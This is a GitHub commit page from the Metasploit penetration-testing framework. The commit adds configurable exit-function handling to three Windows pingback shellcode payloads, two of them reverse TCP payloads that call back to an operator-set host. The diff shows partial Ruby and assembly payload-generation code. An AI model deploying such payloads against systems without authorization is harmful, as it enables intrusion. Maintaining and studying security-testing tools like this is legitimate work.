Skip to content
Permalink
Browse files

Land #12159, EXITFUNC for pingback

  • Loading branch information...
wvu-r7 committed Aug 2, 2019
2 parents 6572fa9 + c9d2013 commit cbe4771d29375483fed4a46aea228936bcb4caad
@@ -7,6 +7,7 @@
require 'msf/core/handler/bind_tcp'
require 'msf/core/payload/windows/block_api'
require 'msf/base/sessions/pingback'
require 'msf/core/payload/windows/exitfunk'

module MetasploitModule

@@ -17,6 +18,7 @@ module MetasploitModule
include Msf::Payload::Pingback
include Msf::Payload::Windows::BlockApi
include Msf::Payload::Pingback::Options
include Msf::Payload::Windows::Exitfunk

def initialize(info = {})
super(merge_info(info,
@@ -30,12 +32,23 @@ def initialize(info = {})
'Session' => Msf::Sessions::Pingback
))

def generate_stage
def required_space
# Start with our cached default generated size
space = cached_size

# EXITFUNK 'seh' is the worst case, that adds 15 bytes
space += 15

space
end

def generate
encoded_port = [datastore['LPORT'].to_i,2].pack("vn").unpack("N").first
encoded_host = Rex::Socket.addr_aton(datastore['LHOST']||"127.127.127.127").unpack("V").first
encoded_host_port = "0x%.8x%.8x" % [encoded_host, encoded_port]
self.pingback_uuid ||= self.generate_pingback_uuid
uuid_as_db = "0x" + self.pingback_uuid.chars.each_slice(2).map(&:join).join(",0x")
conf = { exitfunk: datastore['EXITFUNC'] }
addr_fam = 2
sockaddr_size = 16

@@ -134,12 +147,10 @@ def generate_stage
call ebp ; closesocket(socket)
failure:
exitfunk:
mov ebx, 0x56a2b5f0
push.i8 0 ; push the exit function parameter
push ebx ; push the hash of the exit function
call ebp ; ExitProcess(0)
^
if conf[:exitfunk]
asm << asm_exitfunk(conf)
end
Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
end
end
@@ -7,6 +7,8 @@
require 'msf/core/handler/reverse_tcp'
require 'msf/core/payload/windows/block_api'
require 'msf/base/sessions/pingback'
require 'msf/core/payload/windows/exitfunk'

module MetasploitModule

CachedSize = 292
@@ -16,6 +18,7 @@ module MetasploitModule
include Msf::Payload::Pingback
include Msf::Payload::Windows::BlockApi
include Msf::Payload::Pingback::Options
include Msf::Payload::Windows::Exitfunk

def initialize(info = {})
super(merge_info(info,
@@ -29,14 +32,25 @@ def initialize(info = {})
'Session' => Msf::Sessions::Pingback
))

def generate_stage
def required_space
# Start with our cached default generated size
space = cached_size

# EXITFUNK 'seh' is the worst case, that adds 15 bytes
space += 15

space
end

def generate
encoded_port = [datastore['LPORT'].to_i, 2].pack("vn").unpack("N").first
encoded_host = Rex::Socket.addr_aton(datastore['LHOST'] || "127.127.127.127").unpack("V").first
retry_count = [datastore['ReverseConnectRetries'].to_i, 1].max
pingback_count = datastore['PingbackRetries']
pingback_sleep = datastore['PingbackSleep']
self.pingback_uuid ||= self.generate_pingback_uuid
uuid_as_db = "0x" + self.pingback_uuid.chars.each_slice(2).map(&:join).join(",0x")
conf = { exitfunk: datastore['EXITFUNC'] }

asm = %Q^
cld ; Clear the direction flag.
@@ -139,12 +153,10 @@ def generate_stage
; try again
jnz create_socket
jmp failure
exitfunk:
mov ebx, 0x56a2b5f0
push.i8 0 ; push the exit function parameter
push ebx ; push the hash of the exit function
call ebp ; ExitProcess(0)
^
if conf[:exitfunk]
asm << asm_exitfunk(conf)
end
Metasm::Shellcode.assemble(Metasm::X86.new, asm).encode_string
end
end
@@ -6,6 +6,8 @@
require 'msf/core/payload/pingback'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/pingback'
require 'msf/core/payload/windows/x64/block_api'
require 'msf/core/payload/windows/x64/exitfunk'

module MetasploitModule

@@ -15,6 +17,8 @@ module MetasploitModule
include Msf::Payload::Single
include Msf::Payload::Pingback
include Msf::Payload::Pingback::Options
include Msf::Payload::Windows::BlockApi_x64
include Msf::Payload::Windows::Exitfunk_x64

def initialize(info = {})
super(merge_info(info,
@@ -27,7 +31,18 @@ def initialize(info = {})
'Handler' => Msf::Handler::ReverseTcp,
'Session' => Msf::Sessions::Pingback
))
def generate_stage

def required_space
# Start with our cached default generated size
space = cached_size

# EXITFUNK 'seh' is the worst case, that adds 15 bytes
space += 15

space
end

def generate
# 22 -> "0x00,0x16"
# 4444 -> "0x11,0x5c"
encoded_port = [datastore['LPORT'].to_i, 2].pack("vn").unpack("N").first
@@ -38,6 +53,8 @@ def generate_stage
pingback_sleep = datastore['PingbackSleep']
self.pingback_uuid ||= self.generate_pingback_uuid
uuid_as_db = "0x" + self.pingback_uuid.chars.each_slice(2).map(&:join).join(",0x")
conf = { exitfunk: datastore['EXITFUNC'] }


asm = %Q^
cld ; Clear the direction flag.
@@ -241,14 +258,9 @@ def generate_stage
jmp create_socket ; repeat callback
^
end
asm << %Q^
exitfunk:
pop rax ; won't be returning, realign the stack with a pop
push 0 ;
pop rcx ; set the exit function parameter
mov r10, 0x56a2b5f0
call rbp ; ExitProcess(0)
^
if conf[:exitfunk]
asm << asm_exitfunk(conf)
end
Metasm::Shellcode.assemble(Metasm::X64.new, asm).encode_string
end
end

0 comments on commit cbe4771

Please sign in to comment.
You can’t perform that action at this time.